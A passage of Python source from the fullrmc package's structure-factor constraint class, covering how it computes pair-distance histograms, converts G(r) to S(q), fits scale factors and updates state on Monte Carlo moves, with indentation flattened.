dependencies = ['import numpy as np','from fullrmc.Constraints import StructureFactorConstraints']
code = []
if addDependencies:
code.extend(dependencies)
x = list(self.experimentalData[:,0])
y = list(self.experimentalData[:,1])
code.append("x = {x}".format(x=x))
code.append("y = {y}".format(y=y))
code.append("d = np.transpose([x,y]).astype(np.float32)")
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name} = {klass}s.{klass}\
(experimentalData=d, dataWeights=dw, weighting='{weighting}', atomsWeight={atomsWeight}, \
rmin={rmin}, rmax={rmax}, dr={dr}, scaleFactor={scaleFactor}, adjustScaleFactor={adjustScaleFactor}, \
shapeFuncParams=sfp, windowFunction=wf, limits={limits})".format(name=name, klass=klass,
weighting=self.weighting, atomsWeight=self.atomsWeight, rmin=self.rmin,
rmax=self.rmax, dr=self.dr, scaleFactor=self.scaleFactor,
adjustScaleFactor=self.adjustScaleFactor, limits=self.limits))
code.append("{engine}.add_constraints([{name}])".format(engine=engine, name=name))
# return
return dependencies, '\n'.join(code)
#def __getstate__(self):
# # make sure that __Gr2SqMatrix is not pickled but saved to the disk as None
# state = super(StructureFactorConstraint, self).__getstate__()
# state["_StructureFactorConstraint__Gr2SqMatrix"] = None
# return state
#
#def __setstate__(self, state):
# # make sure to regenerate G(r) to S(q) matrix at loading time
# self.__dict__.update( state )
# self.__set_Gr_2_Sq_matrix()
#
def __set_Gr_2_Sq_matrix(self):
if self.__experimentalQValues is None or self.__shellCenters is None:
self.__Gr2SqMatrix = None
else:
Qs = self.__experimentalQValues
Rs = self.__shellCenters
dr = self.__shellCenters[1]-self.__shellCenters[0]
qr = Rs.reshape((-1,1))*(np.ones((len(Rs),1), dtype=FLOAT_TYPE)*Qs)
sinqr = np.sin(qr)
sinqr_q = sinqr/Qs
self.__Gr2SqMatrix = dr*sinqr_q
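    # Implementation note: __Gr2SqMatrix holds the discretized sine-transform
    # kernel sin(Q*r)/Q * dr, so _get_Sq_from_Gr below reduces
    # S(Q) = 1 + (1/Q) * int_0^inf G(r) sin(Qr) dr to the Riemann sum
    # 1 + sum_r G(r) * sin(Q*r)/Q * dr over the histogram shell centers.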
def __set_weighting_scheme(self):
if self.engine is not None:
self.__elementsPairs = sorted(itertools.combinations_with_replacement(self.engine.elements,2))
#elementsWeight = dict([(el,float(get_element_property(el,self.__weighting))) for el in self.engine.elements])
#self._elementsWeight = dict([(el,self.__atomsWeight.get(el, float(get_element_property(el,self.__weighting)))) for el in self.engine.elements])
self._elementsWeight = get_real_elements_weight(elements=self.engine.elements, weightsDict=self.__atomsWeight, weighting=self.__weighting)
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight)
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
else:
self.__elementsPairs = None
self.__weightingScheme = None
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__elementsPairs' : self.__elementsPairs,
'_StructureFactorConstraint__weightingScheme': self.__weightingScheme})
def __set_histogram(self):
if self.__minimumDistance is None or self.__maximumDistance is None or self.__bin is None:
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
else:
# compute edges
if self.engine is not None and self.rmax is None:
minHalfBox = np.min( [np.linalg.norm(v)/2. for v in self.engine.basisVectors])
self.__edges = np.arange(self.__minimumDistance,minHalfBox, self.__bin).astype(FLOAT_TYPE)
else:
self.__edges = np.arange(self.__minimumDistance, self.__maximumDistance+self.__bin, self.__bin).astype(FLOAT_TYPE)
# adjust rmin and rmax
self.__minimumDistance = self.__edges[0]
self.__maximumDistance = self.__edges[-1]
# compute shellCenters
self.__shellCenters = (self.__edges[0:-1]+self.__edges[1:])/FLOAT_TYPE(2.)
# set histogram size
self.__histogramSize = INT_TYPE( len(self.__edges)-1 )
# set shell centers and volumes
self.__shellVolumes = FLOAT_TYPE(4.0/3.)*PI*((self.__edges[1:])**3 - self.__edges[0:-1]**3)
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__minimumDistance': self.__minimumDistance,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance,
'_StructureFactorConstraint__shellCenters' : self.__shellCenters,
'_StructureFactorConstraint__histogramSize' : self.__histogramSize,
'_StructureFactorConstraint__shellVolumes' : self.__shellVolumes})
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def _on_collector_reset(self):
pass
@property
def rmin(self):
""" Histogram minimum distance. """
return self.__rmin
@property
def rmax(self):
""" Histogram maximum distance. """
return self.__rmax
@property
def dr(self):
""" Histogram bin size."""
return self.__dr
@property
def bin(self):
""" Computed histogram distance bin size."""
return self.__bin
@property
def minimumDistance(self):
""" Computed histogram minimum distance. """
return self.__minimumDistance
@property
def maximumDistance(self):
""" Computed histogram maximum distance. """
return self.__maximumDistance
@property
def qmin(self):
""" Experimental data reciprocal distances minimum. """
return self.__qmin
@property
def qmax(self):
""" Experimental data reciprocal distances maximum. """
return self.__qmax
@property
def dq(self):
""" Experimental data reciprocal distances bin size. """
return self.__experimentalQValues[1]-self.__experimentalQValues[0]
@property
def experimentalQValues(self):
""" Experimental data used q values. """
return self.__experimentalQValues
@property
def histogramSize(self):
""" Histogram size"""
return self.__histogramSize
@property
def shellCenters(self):
""" Shells center array"""
return self.__shellCenters
@property
def shellVolumes(self):
""" Shells volume array"""
return self.__shellVolumes
@property
def experimentalSF(self):
""" Experimental Structure Factor or S(q)"""
return self.__experimentalSF
@property
def elementsPairs(self):
""" Elements pairs """
return self.__elementsPairs
@property
def atomsWeight(self):
"""Custom atoms weight"""
return self.__atomsWeight
@property
def weighting(self):
""" Elements weighting definition. """
return self.__weighting
@property
def weightingScheme(self):
""" Elements weighting scheme. """
return self.__weightingScheme
@property
def windowFunction(self):
""" Convolution window function. """
return self.__windowFunction
@property
def Gr2SqMatrix(self):
""" G(r) to S(q) transformation matrix."""
return self.__Gr2SqMatrix
@property
def _experimentalX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
@property
def _experimentalY(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalSF
@property
def _modelX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
def listen(self, message, argument=None):
"""
Listens to any message sent from the Broadcaster.
:Parameters:
#. message (object): Any python object to send to constraint's
listen method.
#. argument (object): Any type of argument to pass to the
listeners.
"""
if message in ("engine set","update pdb","update molecules indexes","update elements indexes","update names indexes"):
self.__set_weighting_scheme()
# reset histogram
if self.engine is not None:
self.__set_histogram()
self.reset_constraint() # ADDED 2017-JAN-08
elif message in("update boundary conditions",):
self.reset_constraint()
def set_rmin(self, rmin):
"""
Set rmin value.
:parameters:
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
"""
if rmin is None:
minimumDistance = FLOAT_TYPE( 2.*PI/self.__qmax )
else:
assert is_number(rmin), LOGGER.error("rmin must be None or a number")
minimumDistance = FLOAT_TYPE(rmin)
if self.__maximumDistance is not None:
assert minimumDistance<self.__maximumDistance, LOGGER.error("rmin must be smaller than rmax %s"%self.__maximumDistance)
self.__rmin = rmin
self.__minimumDistance = minimumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmin': self.__rmin,
'_StructureFactorConstraint__minimumDistance': self.__minimumDistance})
# reset histogram
self.__set_histogram()
def set_rmax(self, rmax):
"""
Set rmax value.
:Parameters:
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
"""
if rmax is None:
dq = self.__experimentalQValues[1]-self.__experimentalQValues[0]
maximumDistance = FLOAT_TYPE( 2.*PI/dq )
else:
assert is_number(rmax), LOGGER.error("rmax must be None or a number")
maximumDistance = FLOAT_TYPE(rmax)
if self.__minimumDistance is not None:
assert maximumDistance>self.__minimumDistance, LOGGER.error("rmax must be bigger than rmin %s"%self.__minimumDistance)
self.__rmax = rmax
self.__maximumDistance = maximumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmax': self.__rmax,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance})
# reset histogram
self.__set_histogram()
def set_dr(self, dr):
"""
Set dr value.
:Parameters:
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
"""
if dr is None:
bin = 2.*PI/self.__qmax
rbin = round(bin,1)
if rbin>bin:
rbin -= 0.1
bin = FLOAT_TYPE( rbin )
else:
assert is_number(dr), LOGGER.error("dr must be None or a number")
bin = FLOAT_TYPE(dr)
self.__dr = dr
self.__bin = bin
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__dr': self.__dr,
'_StructureFactorConstraint__bin': self.__bin})
# reset histogram
self.__set_histogram()
def set_weighting(self, weighting):
"""
Set elements weighting. It must be a valid entry of pdbparser atom's
database.
:Parameters:
#. weighting (string): The elements weighting scheme. It must be
any atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius)
defined in pdbparser database. In case of xrays or neutrons
experimental weights, one can simply set weighting to 'xrays'
or 'neutrons' and the value will be automatically adjusted to
respectively 'atomicNumber' and 'neutronCohb'. If attribute
values are missing in the pdbparser database, atomic weights
must be given in atomsWeight dictionary argument.
"""
if weighting.lower() in ["xrays","x-rays","xray","x-ray"]:
LOGGER.fixed("'%s' weighting is set to atomicNumber"%weighting)
weighting = "atomicNumber"
elif weighting.lower() in ["neutron","neutrons"]:
LOGGER.fixed("'%s' weighting is set to neutronCohb"%weighting)
weighting = "neutronCohb"
assert is_element_property(weighting),LOGGER.error( "weighting is not a valid pdbparser atoms database entry")
assert weighting != "atomicFormFactor", LOGGER.error("atomicFormFactor weighting is not allowed")
self.__weighting = weighting
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__weighting': self.__weighting})
def set_atoms_weight(self, atomsWeight):
"""
        Set custom atoms weight. This is the way to set atoms weights
        different from those of the given weighting scheme.
:Parameters:
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
               atoms element and values are custom weights. If None or a partial
               dictionary is given, missing elements weights will be set
               according to the given weighting scheme.
"""
if atomsWeight is None:
AW = {}
else:
assert isinstance(atomsWeight, dict),LOGGER.error("atomsWeight must be None or a dictionary")
AW = {}
for k in atomsWeight:
assert isinstance(k, basestring),LOGGER.error("atomsWeight keys must be strings")
try:
val = float(atomsWeight[k])
except:
raise LOGGER.error( "atomsWeight values must be numerical")
AW[k]=val
# set atomsWeight
self.__atomsWeight = AW
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__atomsWeight': self.__atomsWeight})
def set_window_function(self, windowFunction):
"""
Set convolution window function.
:Parameters:
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
               artificial wrinkles; the main reason, among others, is that
               G(r) is computed by applying a sine Fourier transform to the
               experimental structure factor S(q). Therefore a window function is
used to best imitate the numerical artefacts in the experimental
data.
"""
if windowFunction is not None:
assert isinstance(windowFunction, np.ndarray), LOGGER.error("windowFunction must be a numpy.ndarray")
assert windowFunction.dtype.type is FLOAT_TYPE, LOGGER.error("windowFunction type must be %s"%FLOAT_TYPE)
assert len(windowFunction.shape) == 1, LOGGER.error("windowFunction must be of dimension 1")
assert len(windowFunction) <= self.experimentalData.shape[0], LOGGER.error("windowFunction length must be smaller than experimental data")
# normalize window function
windowFunction /= np.sum(windowFunction)
# check window size
# set windowFunction
self.__windowFunction = windowFunction
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__windowFunction': self.__windowFunction})
def set_experimental_data(self, experimentalData):
"""
Set constraint's experimental data.
:Parameters:
#. experimentalData (numpy.ndarray, string): The experimental
data as numpy.ndarray or string path to load data using
numpy.loadtxt function.
"""
# get experimental data
super(StructureFactorConstraint, self).set_experimental_data(experimentalData=experimentalData)
# set limits
self.set_limits(self.limits)
def set_limits(self, limits):
"""
Set the reciprocal distance limits (qmin, qmax).
:Parameters:
#. limits (None, tuple, list): Distance limits to bound
experimental data and compute histograms.
If None is given, the limits will be automatically set to
min and max reciprocal distance recorded in experimental data.
If given, a tuple of minimum reciprocal distance (qmin) or None
and maximum reciprocal distance (qmax) or None should be given.
"""
self._ExperimentalConstraint__set_limits(limits)
# set qvalues
self.__experimentalQValues = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,0].astype(FLOAT_TYPE)
self.__experimentalSF = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,1].astype(FLOAT_TYPE)
# set qmin and qmax
self.__qmin = self.__experimentalQValues[0]
self.__qmax = self.__experimentalQValues[-1]
        assert self.__qmin>0, LOGGER.error("qmin must be bigger than 0. Experimental null q values are ambiguous. Try setting limits.")
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__experimentalQValues': self.__experimentalQValues,
'_StructureFactorConstraint__experimentalSF' : self.__experimentalSF,
'_StructureFactorConstraint__qmin' : self.__qmin,
'_StructureFactorConstraint__qmax' : self.__qmax})
# set used dataWeights
self._set_used_data_weights(limitsIndexStart=self.limitsIndexStart, limitsIndexEnd=self.limitsIndexEnd)
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def update_standard_error(self):
""" Compute and set constraint's standardError."""
# set standardError
totalSQ = self.get_constraint_value()["total_no_window"]
self.set_standard_error(self.compute_standard_error(modelData = totalSQ))
def check_experimental_data(self, experimentalData):
"""
Check whether experimental data is correct.
:Parameters:
#. experimentalData (object): The experimental data to check.
:Returns:
#. result (boolean): Whether it is correct or not.
            #. message (str): Checking message that explains what's wrong
               with the given data.
"""
if not isinstance(experimentalData, np.ndarray):
return False, "experimentalData must be a numpy.ndarray"
if experimentalData.dtype.type is not FLOAT_TYPE:
return False, "experimentalData type must be %s"%FLOAT_TYPE
if len(experimentalData.shape) !=2:
return False, "experimentalData must be of dimension 2"
if experimentalData.shape[1] !=2:
return False, "experimentalData must have only 2 columns"
# check distances order
inOrder = (np.array(sorted(experimentalData[:,0]), dtype=FLOAT_TYPE)-experimentalData[:,0])<=PRECISION
if not np.all(inOrder):
return False, "experimentalData distances are not sorted in order"
if experimentalData[0][0]<0:
return False, "experimentalData distances min value is found negative"
# data format is correct
return True, ""
def compute_standard_error(self, modelData):
"""
        Compute the standard error (StdErr) as the sum of weighted squared
        deviations between the model computed data and the experimental ones.
.. math::
StdErr = \\sum \\limits_{i}^{N} W_{i}(Y(X_{i})-F(X_{i}))^{2}
Where:\n
:math:`N` is the total number of experimental data points. \n
:math:`W_{i}` is the data point weight. It becomes equivalent to 1 when dataWeights is set to None. \n
:math:`Y(X_{i})` is the experimental data point :math:`X_{i}`. \n
        :math:`F(X_{i})` is the model computed data point at :math:`X_{i}`. \n
:Parameters:
#. modelData (numpy.ndarray): The data to compare with the
experimental one and compute the squared deviation.
:Returns:
#. standardError (number): The calculated constraint's
standardError.
"""
# compute difference
diff = self.__experimentalSF-modelData
# return standard error
if self._usedDataWeights is None:
return np.add.reduce((diff)**2)
else:
return np.add.reduce(self._usedDataWeights*((diff)**2))
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.__Gr2SqMatrix, axis=0)+1
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*(Sq-1) + 1
return Sq
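    # Implementation note: scaling (Sq - 1) rather than Sq preserves the
    # S(Q) -> 1 asymptote at high Q; get_adjusted_scale_factor below fits the
    # scale factor on the reduced quantities for the same reason.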
def __get_total_Sq(self, data, rho0):
"""This method is created just to speed up the computation of
the total Sq upon fitting."""
Gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["inter"][idi,idj,:]
Gr += wij*nij/Dij
else:
Nij = ni*nj
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["intra"][idj,idi,:] + data["inter"][idi,idj,:]+data["inter"][idj,idi,:]
Gr += wij*nij/Dij
        # Divide by shell volumes
Gr /= self.shellVolumes
# compute total G(r)
#rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0)*(Gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
        # get fitted scale factor
self._fittedScaleFactor = self.get_adjusted_scale_factor(self.__experimentalSF, Sq, self._usedDataWeights)
# apply scale factor
Sq = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
Sq = self._apply_multiframe_prior(Sq)
# convolve total with window function
if self.__windowFunction is not None:
Sq = np.convolve(Sq, self.__windowFunction, 'same')
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
"""Overload to reduce S(q) prior to fitting scale factor.
S(q) -> 1 at high q and this will create a wrong scale factor.
Overloading can be avoided but it's better to for performance reasons
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData-1, modelData-1, dataWeights)
return SF
def _get_constraint_value(self, data, applyMultiframePrior=True):
# http://erice2011.docking.org/upload/Other/Billinge_PDF/03-ReadingMaterial/BillingePDF2011.pdf page 6
#import time
#startTime = time.clock()
output = {}
for pair in self.__elementsPairs:
output["sf_intra_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_inter_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_total_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:]
else:
Nij = ni*nj
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:] + data["intra"][idj,idi,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:] + data["inter"][idj,idi,:]
# compute g(r)
nij = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
dij = nij/self.__shellVolumes
Dij = Nij/self.engine.volume
gr += wij*dij/Dij
# calculate intensityFactor
intensityFactor = (self.engine.volume*wij)/(Nij*self.__shellVolumes)
# divide by factor
output["sf_intra_%s-%s" % pair] *= intensityFactor
output["sf_inter_%s-%s" % pair] *= intensityFactor
output["sf_total_%s-%s" % pair] = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
# Compute S(q) from G(r)
output["sf_intra_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_intra_%s-%s" % pair])
output["sf_inter_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_inter_%s-%s" % pair])
output["sf_total_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_total_%s-%s" % pair])
# compute total G(r)
rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0) * (gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# multiply by scale factor
output["total_no_window"] = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
if applyMultiframePrior:
output["total_no_window"] = self._apply_multiframe_prior(output["total_no_window"])
# convolve total with window function
if self.__windowFunction is not None:
output["total"] = np.convolve(output["total_no_window"], self.__windowFunction, 'same').astype(FLOAT_TYPE)
else:
output["total"] = output["total_no_window"]
return output
def get_constraint_value(self, applyMultiframePrior=True):
"""
        Compute all partial Structure Factors (SQs).
:Parameters:
#. applyMultiframePrior (boolean): Whether to apply subframe weight
and prior to the total. This will only have an effect when used
frame is a subframe and in case subframe weight and prior is
defined.
:Returns:
            #. SQs (dictionary): The SQs dictionary, where keys are the
element wise intra and inter molecular SQs and values are
the computed SQs.
"""
if self.data is None:
LOGGER.warn("data must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.data, applyMultiframePrior=applyMultiframePrior)
def get_constraint_original_value(self):
"""
Compute all partial Pair Distribution Functions (PDFs).
:Returns:
            #. PDFs (dictionary): The PDFs dictionary, where keys are the
element wise intra and inter molecular PDFs and values are the
computed PDFs.
"""
if self.originalData is None:
LOGGER.warn("originalData must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.originalData)
@reset_if_collected_out_of_date
def compute_data(self, update=True):
""" Compute constraint's data.
:Parameters:
#. update (boolean): whether to update constraint data and
standard error with new computation. If data is computed and
updated by another thread or process while the stochastic
               engine is running, this might lead to a state alteration of
               the constraint which may result in no additional moves being
               accepted in the run.
:Returns:
#. data (dict): constraint data dictionary
#. standardError (float): constraint standard error
"""
intra,inter = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# create data and compute standard error
data = {"intra":intra, "inter":inter}
totalSQ = self.__get_total_Sq(data, rho0=self.engine.numberDensity)
stdError = self.compute_standard_error(modelData = totalSQ)
# update
if update:
self.set_data(data)
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
self.set_standard_error(stdError)
# set original data
if self.originalData is None:
self._set_original_data(self.data)
# return
return data, stdError
def compute_before_move(self, realIndexes, relativeIndexes):
"""
Compute constraint before move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
"""
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
self.set_active_atoms_data_before_move( {"intra":intraM-intraF, "inter":interM-interF} )
self.set_active_atoms_data_after_move(None)
def compute_after_move(self, realIndexes, relativeIndexes, movedBoxCoordinates):
"""
Compute constraint after move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
#. movedBoxCoordinates (numpy.ndarray): The moved atoms new coordinates.
"""
# change coordinates temporarily
boxData = np.array(self.engine.boxCoordinates[relativeIndexes], dtype=FLOAT_TYPE)
self.engine.boxCoordinates[relativeIndexes] = movedBoxCoordinates
# calculate pair distribution function
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# set active atoms data
self.set_active_atoms_data_after_move( {"intra":intraM-intraF, "inter":interM-interF} )
# reset coordinates
self.engine.boxCoordinates[relativeIndexes] = boxData
# compute standardError after move
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
totalSQ = self.__get_total_Sq({"intra":dataIntra, "inter":dataInter}, rho0=self.engine.numberDensity)
self.set_after_move_standard_error( self.compute_standard_error(modelData = totalSQ) )
# increment tried
self.increment_tried()
def accept_move(self, realIndexes, relativeIndexes):
"""
Accept move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
# change permanently _data
self.set_data( {"intra":dataIntra, "inter":dataInter} )
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_standard_error( self.afterMoveStandardError )
self.set_after_move_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
# increment accepted
self.increment_accepted()
def reject_move(self, realIndexes, relativeIndexes):
"""
Reject move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_after_move_standard_error( None )
def compute_as_if_amputated(self, realIndex, relativeIndex):
"""
Compute and return constraint's data and standard error as if
given atom is amputated.
:Parameters:
#. realIndex (numpy.ndarray): Atom's index as a numpy array
of a single element.
#. relativeIndex (numpy.ndarray): Atom's relative index as a
numpy array of a single element.
"""
# compute data
self.compute_before_move(realIndexes=realIndex, relativeIndexes=relativeIndex)
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]
data = {"intra":dataIntra, "inter":dataInter}
# temporarily adjust self.__weightingScheme
weightingScheme = self.__weightingScheme
relativeIndex = relativeIndex[0]
selectedElement = self.engine.allElements[relativeIndex]
self.engine.numberOfAtomsPerElement[selectedElement] -= 1
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight )
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
## END OF ADDED 08 FEB 2017
# compute standard error
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
SF = self.adjustScaleFactorFrequency
self._set_adjust_scale_factor_frequency(0)
rho0 = ((self.engine.numberOfAtoms-1)/self.engine.volume).astype(FLOAT_TYPE)
totalSQ = self.__get_total_Sq(data, rho0=rho0)
standardError = self.compute_standard_error(modelData = totalSQ)
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
self._set_adjust_scale_factor_frequency(SF)
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
# set amputation
self.set_amputation_data( {'data':data, 'weightingScheme':self.__weightingScheme} )
# compute standard error
self.set_amputation_standard_error( standardError )
# reset weightingScheme and number of atoms per element
self.__weightingScheme = weightingScheme
self.engine.numberOfAtomsPerElement[selectedElement] += 1
def accept_amputation(self, realIndex, relativeIndex):
"""
Accept amputated atom and sets constraints data and standard error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
#self.set_data( self.amputationData ) ## COMMENTED 08 FEB 2017
self.set_data( self.amputationData['data'] )
self.__weightingScheme = self.amputationData['weightingScheme']
self.set_standard_error( self.amputationStandardError )
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
def reject_amputation(self, realIndex, relativeIndex):
"""
Reject amputated atom and set constraint's data and standard
error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
